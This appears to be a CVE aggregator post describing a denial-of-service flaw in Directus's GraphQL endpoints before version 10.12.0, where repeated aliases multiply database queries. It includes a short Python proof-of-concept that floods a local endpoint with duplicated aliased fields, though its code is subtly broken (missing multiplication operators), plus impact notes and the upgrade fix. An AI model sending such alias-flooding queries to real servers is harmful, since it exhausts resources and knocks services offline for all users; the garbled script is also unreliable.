Listen to this Post
The vulnerability resides in Directus’ GraphQL endpoints `/graphql` and /graphql/system, which failed to deduplicate resolver invocations within a single request. An authenticated attacker could abuse GraphQL’s aliasing feature to repeat an expensive relational query many times in a single request. This forced the server to execute a large number of independent complex database queries concurrently, multiplying the database load linearly with the number of aliases. The existing token limit on GraphQL queries was not restrictive enough to prevent this, and the relational depth limit applied per alias but did not reduce the total number of queries executed. Since rate limiting is disabled by default, there was no built-in throttle to stop this from exhausting CPU, memory, and I/O resources, potentially degrading or crashing the service. Importantly, any authenticated user, even those with minimal read-only permissions, could trigger this condition. The attack scales linearly with the number of aliases and relational depth, and concurrency exacerbates the effect. This results in a denial-of-service (DoS) scenario where the server becomes unresponsive, affecting all users.
DailyCVE Form
Platform: Directus API
Version: before 10.12.0
Vulnerability : GraphQL Field Duplication
Severity: Medium (6.5)
date: 2024-07-08
Prediction: 2024-07-08 (Fixed)
Analytics under heading What Undercode Say:
Proof of Concept (PoC) script to demonstrate the vulnerability
import requests
url = 'http://0.0.0.0:8055/graphql'
auth_token = 'YOUR_AUTH_TOKEN'
headers = {'Content-Type': 'application/json', 'Authorization': f'Bearer {auth_token}'}
Create a payload with many aliases
id_payload = 'id ' 200
max_payload = 'max {' + id_payload + '} '
full_payload = max_payload 200
data = {'query': 'query { query_name: collection_name_aggregated { ' + full_payload + ' } }'}
response = requests.post(url, headers=headers, json=data)
print(response.json())
Exploit:
An attacker sends a crafted GraphQL query with a large number of aliases for the same field, such as max {id id id ...}. This causes the server to execute numerous identical resolver functions, consuming excessive resources and leading to a denial of service.
Protection from this CVE
Upgrade to Directus version 10.12.0 or later, which introduces request-scoped resolver deduplication. This ensures that multiple aliases invoking the same resolver with identical arguments only execute once per request, sharing the result.
Impact:
- Service degradation or outage due to exhausted database connection pools and server resources.
- Low-privilege requirement: any authenticated user, including read-only accounts, can exploit this.
- Linear scaling of impact with the number of aliases and relational depth.
- Amplified effect when multiple malicious requests are sent concurrently.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
